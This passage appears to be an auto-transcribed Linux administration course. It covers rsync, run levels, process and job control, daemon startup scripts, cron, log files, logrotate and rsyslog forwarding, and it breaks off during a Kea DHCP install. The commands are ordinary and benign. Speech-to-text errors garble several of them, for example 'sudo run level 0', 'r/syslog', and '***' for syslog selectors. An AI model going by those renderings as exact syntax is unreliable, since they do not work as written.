subdirectory structures, V verbose, and I want to create a directory here in the current location on this machine called Ubuntu_server_files, and I'll press enter. So it asks me, of course, for the password for the account name, cblackwell, that I specified on the rsync command line. So I'll go ahead and enter that. After which, if we scroll back up, because we asked for verbose output with -v, it gives us a list of all of the subdirectories and files, including hidden ones with the leading dots here, that it copied over into the specified subdirectory. So if I were to clear the screen here on this Ubuntu desktop host and do an ls, we've got a subdirectory called Ubuntu Server Files. If I go into that subdirectory and do an ls, it's backed up cblackwell, that's the user home directory. If we change directory into that and do an ls, well, let's do an ls-a. We know there were hidden files that were copied, so there they are. And if we change directory into projects, those files were actually copied over as well. If we run the command again immediately, now I've put sudo in front of it. If we run that command once again and press enter and authenticate to the remote host, it says receiving incremental file list, but nothing is shown. Okay, well, that's because nothing has changed on the source on the server. So back on the server, I'm going to modify the project_a.txt file with a new line that says this is newly added data, and I'll go ahead and save that out to the file. Back on our client machine, if we run rsync again to pull down those files from the server, notice this time when it says receiving incremental file list, it's showing us that in the projects folder, it picked up that there was a change in the project_a.txt file. So in other words, rsync is doing an incremental copy only of changed data. This can be incredibly useful. You could even schedule rsync to run periodically via a cron job. In this demo, we're going to be taking a look at how to manage Linux startup and shutdown. Now, this means that we have to experiment a little bit with run levels. Remember, there are various numeric run level states in Linux that mean different things. For example, if I were to issue the command sudo run level 0, that means that we want to shut down the system. If we were to do sudo run level 6, that means that we want to switch to run level 6, which really means what we want to do is restart the system. You can run just the run level command all by itself to return the current run level. Here it's returning run level 5. If we wanted to, we could issue init space 3. Now what that has done is switched from our current run level of 5, the n means there was no previous run level, but now if we type run level, the current run level is 3. Of course, the previous run level is showing now as 5. What does that do? It doesn't look like anything changed. Well, you can have different startup scripts to determine which daemons run in different run levels. Of course, run level 5 supports GUI, run level 3 doesn't. So if I were, for example, to change directory into /etc rc3.d, that's the run level directory for run level 3, if we did an ls, notice we've got a number of files here that start with the capital S. So S01 AP port, numerically and alphabetically, would come before S01 dbus, so that daemon would start before the dbus daemon would start when we enter run level 3. Notice we have S01 SSH. SSH is also going to start within this run level. If we were to do an ls of .. to go back one level, rc5.d, then we would have the scripts that determine which daemons will start when we are entering run level 5. Just for fun, why don't we go ahead and run sudo apt install. Why don't we install the Apache 2 web server and experiment with its startup on this machine? So do you want to continue? I'll type in the letter Y for yes. And just like that, we've got the Apache web server stack running. We can verify that, of course, with sudo service Apache 2, it's called, status. Okay, it's active and running. Notice here it also says enabled. Well, that means it's enabled on system startup. So therefore, if we do an ls of the rc3.d directory, we're going to have a new entry for starting the Apache 2 daemon. What's interesting is if you do a long listing with ll, notice that these are symlinks that point to the appropriate scripts. Now, you might also have the presence, remember, of kill scripts to kill certain types of daemons when entering that run level, so they will not be running. But we can manipulate it beyond the default, such as when we install a package. We could run sudo systemctl disable Apache 2. Okay, so now if we do an ls of our current directory, notice that we no longer have a symlink to start Apache 2, but instead to kill it. Capital K is the prefix on that file name. Of course, we could re-enable it by changing disable to enable. And now if we clear the screen once again and do an ls of the current directory, rc3.d under etc, we're back to having our start symlink for the Apache 2 daemon. Now, the other thing to think about too is really how often will we be switching between run levels? That's actually kind of rare. It might be much more common, of course, to determine whether you want certain daemons to run or not. And I mean, really, what you could do for run level 3, if you really wanted to, you could simply delete any of these symlinks in here to prevent those from starting again when the machine boots. Same goes for the kill files in here that start with the capital K. So using the systemctl command is just really manipulating these symlinks. You can do it yourself at the command line because they are files if you wish. We can also determine what the default run level for a given Linux host is by running sudo systemctl set-default, for example, multi-user.target. What we're doing here is setting the default run level to be run level 3. Whereas if you set it to graphical.target, you would be setting that to be run level 5. Now let's once again do an LL in the run level 3 directory. So we know that we've got symlinks here, for example, for S01 Apache 2. And we said it points to a daemon startup script under etc init.d. In this case, Apache 2 is it. So let's take a look at that. Let's change directory to /etc/init.d. Clear the screen. Let's do an ls-ld of things that start with Apache. Now, the lowercase -d means do not show me what's in directories that start with the text Apache. Just show me the entry itself. Okay, so we don't have directories, but we've got 2 files. Let's cat the Apache 2 script file and pipe that to more. So this is a shell script, as shown at the top here, with this directive that tells it what to execute with. So under /bin/sh, standard bash shell. So this contains the instructions on actually starting the Apache web server daemon. This is what the symlink in the run level directory is pointing to. So if you really want to customize the behavior of daemons in terms of how they start, how they stop, you can go ahead and modify the appropriate file here if you know what you're doing to get the desired behavior that will then impact the symlinks or the references to these daemon startup scripts for given run levels. So this will give us a sense then of how we might work with background daemons and determine how they behave with given run levels, as well as how to set the default system run level. In this demo, we're going to focus on how to manage Linux processes and daemons. Let's start first of all by taking a look at some very common commands that help us achieve this. I'm going to issue the ps command for processes. When I press enter, it only shows me the processes that are relative to my current user login session. Notice the column headings. We've got a PID, the process ID. Then we have the TTY, the terminal from which this occurred. PTS/0 is sudo terminal 0, which is the console of the machine itself. And so one of the running processes, of course, to allow this to be possible in the first place is my shell, my bash shell. So bash shows as the command, after which at the time we issued the ps command itself was running, and it was assigned a process ID by the kernel. However, if we take a look at the man page for the ps command, down below in the help, it says to see every process on the system using BSD syntax, you can do ps AXU. Okay, Q for quit, ps AXU. We are getting a list of all of the running processes on this machine. Let's just scroll up to see what the column headers are, of course. So these are not only those tied to the current user login session, of course. Under the user column, we have the user under which the process is running. Notice that we have quite a few of them here running under root, and that's normal for system services. But as we go further down, you'll notice that there are variations on Linux user accounts that are being used for various items. Now, of course, we've got the process ID or the PID column, the init process shown here on the far right in the command column for the first entry, which is /sbin/init, is always spawned first by the kernel. But it's not tied to a user terminal session, is it? So therefore, under the TTY column, we have a question mark, and that's what that means. Of course, what's important here when we manage processes and daemons is we can take a look at the %CPU, %memory columns, which can be very useful if you've got some kind of a resource hog process running on your machine that seems to be consuming way too much CPU time, way too much memory beyond our normal baseline of normal activity. This will help you identify that item. However, it's only as up to date as when you last ran this ps command. And so what we can also do is run the top command. This keeps changing every few seconds. I think the default is about 3 seconds, although we can change the delay to make it more frequent or less frequent, but it's always updating the list to show me the top running processes consuming resources. And so in this way, if we're trying to solve a problem to find out which process is consuming much more or abnormal amounts of CPU time and memory, this would be really a great command to run because you don't have to keep issuing the command as you would with ps. This also gives some interesting items up at the top, such as the number of tasks, in this case 211 in total. There are a number of them in a sleeping state. They're idle. They're not actually performing work right now. If I were to press D while I'm in top, there in fact it is 3 seconds is the default delay. We could change that, for example, to 0.5 every half second, and notice the update will be much quicker. I'll go back to the default of every 3 seconds. What I can also do when I'm in top is I can press the letter F. F stands for fields. What I can do is determine which fields I want displayed in the output. The fields that are currently shown, these are the columns across the top, are shown here with an asterisk to the left. Maybe I'm interested in the PID and the user under which a process is running, but maybe PR for the priority. I don't want that. I'll hit the spacebar to remove it, and the asterisk is removed. Plus, it becomes unbolded. Same with the nice value, NI, and virtual memory. Get rid of all that. Maybe all I want to do is see a handful of items here. I can press Enter. I can press Escape to get back to my top screen. It's still running, of course. And now I only have the columns across the top that perhaps I would find relevant when using top, maybe to monitor my Linux host or to troubleshoot any problems like resource hogs. I'll type Q for quit to get out of the top command, and I'll clear the screen. We talked about the ps command. There's also a useful command called pstree. However, on some Linux distributions, you might be prompted to install it. In any case, if I take a look at the output from the pstree command, at the top, it starts with systemd. We've made multiple references to init with process ID of 1, which is still valid. But newer Linux distributions will show it as systemd here. under which all other processes are spawned. For example, notice the Apache 2 web server is spawned under systemd, so is cron, so is the SSH daemon. So this can be a handy way to see if there are subordinate daemons started by daemons like SSH. But to make that output make even more sense in a hierarchy, you could issue pstree, but you could add the -p parameter. Then this is what you get. All of the subordinate processes are very, very easy to see indented underneath their parent. For example, notice all of the child processes running for the Apache web server component. The other thing to think about is the kill command. We know that when we run, for example, psaxu, we get a list of everything running. And what's important here is, of course, that we take note of the process ID, which is shown here in the second column starting from the left. You can also pipe the output from ps to grep if you want to be able to filter it in some way, such as maybe looking for Apache. If, for example, one of the Apache processes you've been able to identify as not being responsive or consuming too much CPU or memory, you could take note of its process ID. In this example, let's say we're going to use 5614, and you could use the kill command to terminate it. Now I'm going to need to prefix that with sudo, of course, if I run sudo kill 5614. Now remember, the default behavior here is it will try to shut that down gracefully. So that if we go back in our history of commands here using the up arrow key and go back to our ps command where we grepped it, notice that process 5614 is no longer running. If we take a look at the man page for kill, notice that one of the options you can pass on the command line is a dash and the signal. Now the signal lets you control how that process will be killed, whether it's abrasively, immediately, or whether it's gracefully and giving it time to shut down and perhaps write things to disk and whatnot. So this gives us a sense then of how we might manage Linux processes and daemons using built-in command line tools. In Linux, we've talked about the fact that we can run processes in the foreground simply, for example, by typing a command such as ls. ls itself is a process, and we even saw that we can view that information with the ps or the process command. So the bash shell is shown here and the ps command as well. But what are Linux jobs? We're going to focus on Linux jobs and what these really are. These are commands, whether they're individual commands that we issue, or it could be the result of commands executing from within a shell script. It doesn't matter. But what it means is that we have standard Linux commands of some kind doing something, but it's running in the background. So it could be a single command line that we forced into the background because it takes so long to run. It could be a shell script that we've forced into the background. Maybe it's a cron job that runs on a schedule that in turn runs things in the background, whether it's command line or shell script. It doesn't matter how you do it. A job is something that you are forcing to run in the background because it normally does not. The way that you force something to run as a background job, as it's called in Linux, is by suffixing the command or the reference to invoking a script with an ampersand. So as an example, let's just go ahead and use the ping command, which will continue with output on the screen until we tell it not to. But let's say I ping www.skillsoft.com. Whether we get replies back or not is not the point here. The point is that we've got some command running that is tying up our command prompt. That's running in the foreground. Now, we didn't force it to run in the background. We didn't suffix this with an ampersand. What we can do is we can press Control-Z. When we do this, what we are doing is we are stopping the process and we are sending it to the background. If I type in jobs, notice that the job shows up in the background. It's job number 1, but it shows as being stopped. If I were to type FG, foreground, now I'm not going to tell it which job number. There's only one job and it's the most recent one. Foreground without any parameters brings up the most recent job sent to the background. Notice we're back running ping www.skillsoft.com. Let's exit that with Control-C. This time, what I'd like to do is run the ping command again, except add an ampersand at the end of it. Now notice we're still getting the output on the screen. Although the other thing that we see here is that it's been sent in the background as job number 1. 6750 is the process ID. Now I'm just going to go ahead and press enter and type jobs. Now pressing enter got us our command prompt back. So what's happening here then is that the job is now running in the background. It doesn't show as stopped. Of course, we also see the actual command that is running. Now, if we were to start getting replies, it would start interrupting the foreground. So yet again, let's bring up that previous command, but after the skillsoft.com part of that command, I'm going to redirect the output with the greater than sign to a file in the local directory, let's say called ping results .txt. The ampersand will follow that. I'll press enter. This time we get nothing in the foreground. Of course, we can cat the ping results file, and we'll start seeing anything that might come back as a result. Again, if we type in jobs, we now have it running as job number 2. And again, to bring it to the foreground, we could just type FG or FG2. There's our command. Now, that's fine. I'll press Control-C to end that. But when you have jobs that are running, so I press Control-C to stop that second job, job 2 is gone, the first one is still there. Now we know that job number 1 is running and we want to get rid of it. One way to do that is by using the kill command and using %1, where 1 is the job number. Now if we run the jobs command, notice the job is showing in the list, but it's showing as having been terminated. Now let's run our ping command in the background yet again. So I'm going to use the up arrow key to go back to it and press enter. So once again, if we type in jobs, there it is running in the background. Let's use the up arrow key to go back to that command. Let's say that what we had done is we had run a command or a script, but forgotten to suffix it with the ampersand to run it in the background. So of course, it runs in the foreground. We know we can press Control-Z or Control-Z. It shows us a stopped job. If we type jobs, it shows up there as being stopped. So it's been suspended. So it's not running right now. But let's say not only do I want it to run in the background, I want it to actually run like right now. It's not running. It's showing in the background list of jobs, but it's stopped. What we could do is use the background command, BG, followed by, in this case, a 2, job number 2, enter. It returns back job number 2, but what it's done is added an ampersand at the end for us. So now if I type jobs yet again, notice that job number 2 is now running, where previously it was suspended. So if you don't think to run something in the background immediately and then you decide you want to do something else at the command prompt, you can force it into the background quite easily with the BG command. Now I'm going to use the up arrow key yet again to bring up our ping command where we had the ampersand at the end to send that as a background job and keep it running. Except what's different this time at the beginning, I'm going to prefix it with the no hup command, N-O-H-U-P, no hangup. What this means is that we want to keep this running in the background even if we close our terminal window and open yet another one. Now that doesn't mean that if we sign back in, we're going to see it when we type the jobs command. However, we would see it if we use the PS command. Just to make sure we can tell the difference here, I'm going to change the output file name here, which in essence is changing our command line, to ping_results_nohup.txt. We're just changing the file name, so there's no functional difference in what this will do. Enter. Okay, you get the standard message ignoring input and redirecting standard error to standard out. Okay, that's fine. If we type jobs, then of course we do see it listed here currently right now. There's no hup in the file name for the output redirection. If we were to exit our terminal session and sign back in, if we issue the jobs command as expected, nothing is there. So let's say we run psaxu and we grep for the word ping, because we know that's the command that we sent to the background. We'll ignore the second entry here, which is really just showing us that we were grepping for ping. But notice the above command, which is using ping, www.skillsoft.com. It's got its own process ID. This was left running in the background as user C Blackwell because we used the no hangup or no hup command. So there are times when you want things that might take a really long time to run to continue running despite the fact that you want to sign out of a system. So this gives us a sense then of how we can manage Linux background jobs. In this demo, we will be configuring Linux daemon startup scripts. Now in Linux, we know that a daemon is a background running program that stays running even if users aren't signed into a particular terminal session. And a daemon might commonly be in the form of something like a web server stack, or the background cron daemon, which runs scheduled tasks, that type of thing. What we'll be doing here is we'll be taking a look at daemons and their start and kill scripts in the appropriate run level directories. We'll actually take a look at the daemon startup script itself. The first thing I'll do here at the command line in Linux is I'll verify that we have the Apache 2 web server installed. One way to do that is to run sudo service apache 2 status. Well, it knows about the Apache HTTP server. However, it is currently showing as inactive. So I'll press Q. And what I'll do is I'll run sudo service apache 2 start. I'm just going to use the up arrow key to go back so that we can check the status now that we've told it to start at the command line. And of course, now the web server is showing as active and running. And we've got the date and timestamp for when that occurred, which is just a few seconds ago. Notice the references down below to /usr/sbin/ and then the Apache 2 binary. Also notice the reference up on the loaded line here to /lib/systemd. Systemd controls processes on the Linux machine, /system, and then notice to the reference of the file in system called apache2.service. We're going to take a look at that in a moment. Also notice after that it says enabled, meaning that the Apache web server is enabled to start automatically in a certain run level. If I type Q for quit, we can then change directory into /lib/systemd/system. Why? Because we want to take a look at the apache2.service file. So I'm going to go ahead and cat apache2.service. We'll pipe that to more, so it stops after the first screen full of information. Okay, so the description is the Apache HTTP server. Then we have a directive here, a keyword. It says after equals. So this means any other dependent services that should be started before this one starts. So this one, the Apache HTTP server, should start after network.target, remote-fs.target, and nss-lookup.target. Okay, well that's interesting. So there's an order to these daemons in terms of their startup, which can be important. Naturally, you won't be able to start the Apache web server until you've got the underlying network service running on Linux so that you can use the IP address and bind a port number to it to make a socket. Down under the service section, and the sections here are denoted, of course, within square brackets, we've got exec start. So how do we execute the startup of this daemon? /usr/sbin/apache-ctl start. Okay. And at the bottom, under the install section, we've got a keyword stating wanted by equals, and it says multi-user.target, which references run levels 2, 3, and 4. In other words, when should this daemon start up? That means then, if I were to do an ls of /etc/rc3.d, we've got a start script file here, s01 apache2, which is actually a symlink. If we were to do an ll of /etc/rc3.d, notice that the script for Apache2 is pointing to the init.d directory under /etc and Apache2. That's a script. Let's go examine that one. Change directory to /etc/init.d, and let's cat the Apache2 file here and pipe that to more. Okay, so this is a script, of course, which controls whether or not the Apache web server has a valid configuration and whether or not it will actually start. Okay, so there is a dependency on how these daemons, in this case, we're focusing on the Apache web server, actually fire up or stop. You can imagine what might happen if I were to issue a command like this, sudo update-rc.d apache2 disable. That looks like it's probably going to disable the Apache2 web server daemon from starting. Let's press enter. If I were to go back through my command history to where we ran ls of /etc/rc3.d, that's the run level 3 directory, notice that we no longer have a start script for Apache. Instead, we have a kill script to ensure that that daemon is not running when we are in run level 3. Back in our command line history, if we change directory once again to /lib/systemd/system, and if we cat the apache2.service file, now if we type run level at the command line, it will tell us our current run level. Currently, our run level is 3. The 5 here references the previous run level we were in before run level 3. Now, even though it's not very common, at the command line, you can also switch between run levels, as we know, by using sudo init, and then let's say 5 to start run level 5. Now, if I type run level, it returns that we are now in run level 5, where previously it was run level 3. When you switch run levels either this way manually, or when the system starts up and fires up the default run level, it will read the appropriate start scripts for daemons and make sure that they are running for that given run level. In this demo, I'm going to be managing cron jobs. Remember that cron is a background daemon. We can check its status with sudo service cron status, and it shows as being active and running. This is a background service or daemon that is used to run scheduled jobs. Now, the job might be a Linux command line expression, or it could be a shell script, and we can schedule that job to run all the way down to the minute level. So hourly, daily, weekly, monthly, whatever the need is. I'll press Q to get out of this output, clear the screen. Now I'm going to run sudo nano etc/crontab. This is the system-wide crontab file. When I say system-wide, what I mean is it's not tied to a specific user. We'll look at user crontabs afterwards. If I open up the crontab file, in it I've got a bunch of comments. These are prefixed with the pound symbol or the hashtag symbol that tell me from left to right what each of the columns are. So the minute that I want something to run is the first column on the left, then the hour, followed by the day of the month, followed by the month number, and then the day of the week, where 0 is Sunday, and 6 would be Saturday. Because it's the system crontab file, you'll recall that we have to specify the user under which this should run. That's the next column. That user has to have the correct permissions to be able to run the command or read the script and execute it in order for that to run correctly. And then, of course, we have the command to be executed, whether it's just a Linux command line expression or a reference to a shell script somewhere. Bear in mind that if the command results in output on the screen, you'll have to redirect that to a file, for example, so the output is stored somewhere. So if I wanted to add a job here, I could just go to the bottom. Let's say I want something to run every minute. That would be /1. I could use a tab or a space, and then in the next column, specify the hour, let's say every hour, then the day of the month number, day of the week, the user under which it should run, let's say root, and then the command. Let's say I'm simply going to run the ls command against /home/C Blackwell, and we'll just redirect that with the greater than sign to /home/C Blackwell/filelist.txt. It's not an extremely useful command, but all we're looking at here is the construct of how we would get that command to run. Now, what I can also do, instead of just the single greater than sign for output redirection, depending on what your requirements are, is append to an existing file. So with the double greater than sign, I'm going to go ahead and press Control-X, yes, to write that out to the system crontab file, and it's done. Now, if I type print working directory pwd, we're in home C Blackwell. If I type ls, we don't yet have our file list file that was created because we have to wait for at least 1 minute to pass by. And if I wait within a minute, I should see the file list file. If I cat file list.txt, it simply gives me a list of the files in the current directory, the user home directory for C Blackwell. If I wait at least 1 more minute, I will notice that the output will have doubled because it keeps appending to it. It's running every minute. We had */1, which means every minute. Now remember that the purpose of scheduling jobs is to do something automatically, normally on a recurring basis, like some kind of cleanup task to clean up temporary files, or maybe to check network connectivity, or to start and stop daemons on a scheduled basis if you have that requirement. So notice if I cat the file.txt file yet again, it has been appended to automatically because that job is running every minute in the background. Okay, I'm going to clear the screen. Let's work on the user crontab file. If I type ID, I'm logged in as user C Blackwell. So when I type crontab-e to edit the crontab, I'm editing it for user C Blackwell. So then it says there's no crontab for that person, at least not yet. Using an empty one, select an editor. I'm going to type in the number 1 so I can use the nano text editor. That's just a preference. Now remember that with a user crontab, one of the differences is that we do not have a username column under which the scheduled task or command should run because it knows it should run as user C Blackwell in this particular case. So from left to right, it would be minute. So maybe I'll put 56. I know that's just a few minutes from now. And I know it's going to be 7:56 in a few minutes. I'll put in 7. And for the day of month, put in an asterisk. Same with the month number. You can put at least one space to separate these things. That's all you need. You can put more, you can tab separate it. But maybe what I'll do now is echo the text, user crontab test, and we will append that to a file in home/C Blackwell called user cron test.txt. Okay, I'll Control-X to write that out, and I will save it. So now, if we do an ls of /var/spool/cron, and then take it one step further into crontabs, of course, we'll have to put sudo in front of it. Notice we've got a C Blackwell crontab file. A user can type crontab-l to list whatever is in their crontab. And notice down below, we've got our little echo command that's going to write to that file or append to that file. If I type date to get the date and the time, notice it's 7:55 a.m., so it's not quite 7:56, but we'll just wait a few moments, at which point when we do an ls, we will have the user crontab file that will have been created. So let's just hang out for a moment. So if I type ls, notice the presence now of the user cron test file. And of course, if I were to cat that file, it simply shows user crontab test. So tomorrow at 7:56 a.m., it will append the same thing to that file. Of course, these are silly examples in that they aren't really doing anything useful. But what we're trying to understand is the underlying infrastructure that makes this work. If we can understand how to force something to run on a scheduled basis, then the sky's the limit. You could have a script or a command that performs any task that you need to occur at a certain time. In this demonstration, we'll be taking a look at some standard Linux log files. It's important to be able to know where log files are so you can quickly locate any messages that might be relevant for troubleshooting or for security threat hunting, or to check on the performance of some kind of a service in Linux. The first thing I'll do here is change directory to /var/log. According to the Linux File System Hierarchy Standard, the HFS, this is where log files should reside. And in most cases across pretty much all Linux distributions, this is true. You'll have the log files for just about anything you might choose to install, in addition to standard log files, somewhere under var/log. If I type ls, notice that we have a number of log files, like auth.log, we have the dmessage file, the fail log, kern.log, the kernel.log, lastlog, syslog, and so on. But notice we also have subdirectories for various packages, like the Apache 2 web server. There's a separate subdirectory for it, so that if I were to ls the Apache 2 subdirectory, it itself has a number of logs for the web server, like a standard access.log file, an error.log file. And if you've configured virtual hosts for your web server stack, you have an other_vhosts_access.log file. If you're responsible for managing a given service like an Apache web server on Linux, you need to make sure you know where the log files are. Notice that we also have what appear to be copies of older log files that have a .gz or gzip compressed file extension. For example, with dmessage, log rotation has automatically kept older versions of the dmessage log. Whether it's when they reach a certain size, it just depends on how log rotation is configured for that. Let's take a look, for example, at the authorization log, auth.log. I'll clear the screen and I'll cat auth.log. When you're viewing log entries, of course, what's crucial is that the date and time on the system be correct, because log entries are date and time stamped. And that can be very important in determining when exactly something occurred, whether it's for security, troubleshooting, or performance reasons. So here we have a number of entries here showing that sessions were opened and closed for various users, such as user root. If I were to cat the syslog file, the main system log file, here we have a log of everything that was happening, such as the issuing of commands, like the ls command being issued for user root. Now notice that we have multiple repetitions of running the exact same command. And if you look at the date and timestamps, because we said that was very important, it looks like it's approximately every minute. What this would be telling us is that there is a cron job, it would appear, that is running the ls command and redirecting the output, actually appending it to a file. If I were to run sudo nano/etc/crontab and go to the bottom, indeed, we do have an entry here for a scheduled job that's set to run every minute, /*1. I'm going to comment that out, and I'll go ahead and write that out to the file. So this is handy. We can determine if things are running that maybe perhaps should not be. Important commands that you might be interested in here include the head command. If I were to run the head command against syslog, by default, it shows me the first 10 lines in that file. You can specify the lines if you really want to, the number of lines, or we could display the last 10 lines with the tail command. Tail syslog shows me the 10 most recent log entries here. And notice that one of the most recent entries is related to the reloading of the /etc/crontab file since we just made a change. We commented out that job. Then we can also, of course, filter logs. If I were to cat syslog, I could pipe it to grep-lowercase I, so case insensitive, and maybe I'm looking for Apache 2. So here we've got all the log entries that are related to that. But bear in mind that some services, like the Apache 2 web server, have their own log files in their own log directory, which would have more detailed log messages for the running of that particular service. So if I were to change directory, let's say into Apache 2 and cat, let's say the access log, well, there's been no access to that server. What about the error log? Well, we have a few entries here that are date and timestamps related to that. And if I've configured virtual hosts, then I could view the other virtual hosts access log to look for activity. Back here in /var/log, if I do an ls, it's also important to take note of the dpackage.log, dpkg, which of course is related to software packages on the system. So if I were to cat dpackage dpkg.log, We've got entries related to doing things like installing software and whether that was successful. And of course, we could also grep that, looking for anything specific. For example, Apache 2. Here we've got some details about installing and unpacking all the files related to the Apache 2 service. You can also run the sudo dmesg, D-M-E-S-G command to view the kernel log. And again, we could grep it or head or tail it, depending on what we want to do. Of course, what you can also do is if you pipe the result of, let's say, sudo dmesg to more, which stops after the first screenful, you can type in a front slash, which shows up in the bottom left, and type in what you want to search for. Let's say USB. It'll find occurrences of USB, and I can press the letter N to keep going to the next occurrence. So that can also be handy too when you need to sift through something in a log file with built-in command line utilities. If we type last log, we'll get information about when various user accounts were last logged in, and of course the details related to that. If we were to type in journal CTL and press enter, here again we get some more kernel output that gets logged. That can be handy if you're troubleshooting some kind of hardware-based issues. So if you're not already familiar with where log files are, what the log files are called on your Linux system or systems that you're responsible for, it's important to know this information because it will definitely serve you well in maintaining the system and troubleshooting it quickly. In this demo, I will be configuring Linux log rotation. We've discussed log rotation briefly in that we have a sense that we know that we can't keep log files forever. Depending on what you've got installed on the Linux host and how much activity there is, will determine how quickly log entries get added to log files and in turn how much disk space gets used up. So what we can do is configure log rotation to determine when log files should be rotated. In other words, when the current log file should be saved as a backup and starting a new log file, perhaps even compressing older backup files and how long to keep them or how many copies of them that should be retained. And you might have organizational policies that dictate how long logs need to be kept, which might be influenced by laws or regulations. The first thing I'm going to do here is change directory to /var/log. If I clear the screen and do an ls, here we've got a number of log files, such as the main syslog file, but we've also got subdirectories for log files like the Apache 2 web server package. And notice for the dmesg log file, the kernel log file, we've got a number of rotated or backup copies, such as dmesg.1.gz. It's been compressed using gzip. That can be configured in your log rotation config file, in this case for dmesg. Of course, we can type ll to get a long listing of all the file metadata, including things like the sizes of the files. Let's change the directory to /etc/logrotate.d and clear the screen and type ls. For example, we've got a config file here for the Apache 2 web server, whose logs are stored by default under /var/log/Apache 2. We've got an access log for access to the web server, an error log, and then a virtual host's access log. If we want to configure how log rotation works for Apache 2, then here in the etc/logrotate.d directory, we would simply use the text editor of our choice to open up that file. Now, if the file doesn't already exist, we can go ahead and create it. So what's happening here in the log rotation configuration file for this particular service is we have a reference to the log file or log files that should be checked. Here it's /var/log/Apache2/*.log. So it applies to all of the log files we just mentioned, the access log, the error log, and the virtual host log for the Apache web server stack. After that reference, we have an open curly brace, and then we have a number of directives to control log rotation. And then we have a number of directives controlling log rotation, such as checking daily, missing OK, which is OK if there's not a current log file, rotate 14, so keep 14 copies, compress, which means compress with gzip. Don't bother log rotating if it's not empty. Also, there's a create statement here that's creating the rotated logs, the backed up logs with certain permissions, 640, and then the owning user being set as root, and the owning group being set as ADM. So the 6, of course, means read and write, 4 plus 2, for the owning user. The 4 here means just read for the owning group, ADM, and 0 means no one else has permissions to rotated logs. You can also specify if you want something to execute certain commands or a script before log rotation occurs for this, or after. There's a pre and post rotate set of directives, and then it would close off with the closing curly brace. So I'm just going to exit out of that file, and I'll do an ls. If we were to cat, let's say, the D package configuration file for log rotation, which is related to software packages on this system, it's got the same type of structure. The first reference here is to the log or logs it applies, the log rotation applies. In this case, it's just the dpackage.log file. Same syntax, open curly brace and the closing curly brace at the bottom and the directives in between. Now, how does it know to look at the files in log rotate.d? If we go one directory level back, so that means if we're in the /etc directory, in here we've got a file called logrotate.conf. This is the global logrotate file, but what's interesting is as we go towards the bottom, notice the include statement to include config files in /etc/logrotate.d. So that's how it knows to go into that directory and to look for those files. So what the files are called in there really doesn't matter because they're all going to be checked anyhow. It's just a way to keep things a little separated and clean as opposed to having all of the log rotation statements in this global logrotate.conf file. Notice you can also, at the command line, issue the log rotate command on demand, where you can specify a -d and point it to a specific configuration file like /etc/logrotate.d/apache2.conf. Of course, if you really want to fine-tune and control how often this runs, you could create a cron job for it as well. So you could do the same type of thing against any of the config files, such as dpackage.conf in that location. So that's how we would start to manage log rotation in a Linux environment. Okay, we've spent some time so far discussing various Linux log files, the entries within them, how to filter them, and also how to configure log rotate. But what we can also do is we can forward some or all log entries for various types of log files to a centralized logging host elsewhere on the network. In a larger enterprise, this scales well because instead of having to monitor logs on a multitude of servers, you can monitor logs on one centralized server that collects the logs from that multitude of servers. So how do we do this? Well, let's start here on our centralized logging server. I'm going to begin by running sudo service r/syslog status. What we're doing is checking the r/syslog daemon to ensure that it's active and running, as this is what is going to be used for our log forwarding on the server, as well as for clients that send their log information to this host. You can even configure some types of network appliances like wireless routers to forward their logs to a syslog service running in Linux. So it will vary from device to device, but some of them will support it, even outside of a Linux operating system that you install. If I do an ls of /etc/r/syslog.d, so that's a subdirectory, notice here that we've got a couple of config files. I'm interested in one here for the default configuration. If I were to cat the /etc/r/syslog.d/50-default.conf file, what it's doing is specifying the various Linux facilities, whether it's for authorization, whether it's for cron, whether it's for the kernel. We can determine which types of messages, so kernel.asterisk means all types of messages, not just warnings, for example. We can determine where that will be written to, such as to varlog kern.log. That's on the local host. Okay, but what I want to do is run sudo nano, because I want to edit the /etc/r/syslog.conf file. One of the first things I want to do here is determine if I want to allow syslog forwarding over UDP or TCP. Assuming I want that over UDP, I would make sure I uncomment the module and the input lines related to IMUDP. Notice the default listening port here will be 514. That's commonly used for log forwarding in Linux. Now I'm going to go to the very bottom and add a couple of lines. The first of which will be ***. This means all facilities, so kernel, mail, and so on. And the second asterisk is all types of messages, whether they're warnings and so on. I want all messages for everything. Then I'll add a space question mark to be put into a local folder called remote logs. Then after that, I'll add another line with an ampersand and a tilde. Now, what I'm also going to add before the remote logs line here is a template directive. $template space remote logs, comma, space, and then double quotes, /var/log, %hostname, %/remote log.log. Close double quote. What does this mean? Well, if I've got numerous other clients, we'll call them, that will be configured to forward their logs to this centralized logging host, I want to create a subdirectory unique to that host name, like client 1, client 2, client 3. And within those unique subdirectories, I want the log from that client device to be called remotelog.log. Okay, so that's the reference down below then to !remote logs. I'm going to press Control-X and write that file out to the rsyslog.conf file. I'm also going to run sudo UFW for uncomplicated firewall, assuming I'm using that software firewall solution on this host, to allow 514 as a port number / for UDP. Okay, it says rules were updated. Well, that's good. Then I'm going to run sudo service rsyslog restart to reread the new configuration. And that's it for the server-side config. Let's go to a client. I'm calling it a client. It could also be another server, but I'm going to call it a client device. Let's go to it and configure it to forward its log entries to this host. The only thing I'm going to do here first is type IPA so that we know the IP address of this central logging server. It's 192.168.2.42. Okay, so I'm using an Ubuntu desktop machine as the client, but again, it doesn't have to be a client OS. It can just be another server running some variation of Unix or Linux. And what I'm going to do here is I'm going to run sudo nano /etc/r syslog.conf, same file that we modified on the server. So at the bottom, I'll add a new line, ***, so all types of Linux facilities and types of log messages on this Linux desktop, I want to forward that to our logging server. So after a space, I'll put an @ symbol, 192.168.2.42. That's the IP of our centralized Linux logging host, :514. Remember, it's listening on port 514. So I'll close that and save it. Then I'll run sudo service rsyslog restart here on the client, just like we did on the server. And I can test this by running sudo logger, so I can force a log message using the Linux logger command. And I'm going to send a message to the log on this host, which should be forwarded to our central server. And it will say testing log forwarding dash, does it work? I'll press enter. Back here on the server, in the /var/log directory, if I type ls, notice that I've got not only a subdirectory for the local server, but also for Ubuntu Desktop 1. If we change directory into Ubuntu Desktop 1 and do an ls, there's our remote log file, and if we cat that file, we've got all kinds of log entries, including, if I scroll back up far enough, our forced message, testing log forwarding, does it work? In this demonstration, I will be installing and configuring a DHCP server on Ubuntu Linux. So of course, we would use DHCP because we want to have a centralized IP configuration that gets delivered to clients on the network that are configured to obtain their IP settings automatically through DHCP. So it saves us from going to each device to manually configure IP settings, things like unique IP addresses, subnet masks, and so on. So the first thing I'll do here on my server is run sudo apt install. I'll be installing the KEE, spelled K-E-E, DHCP server stack. So it asks, do you want to continue? I will type in the letter Y for yes, and I'll press enter. Okay, so it's pulling down the package from repositories over the internet and installing 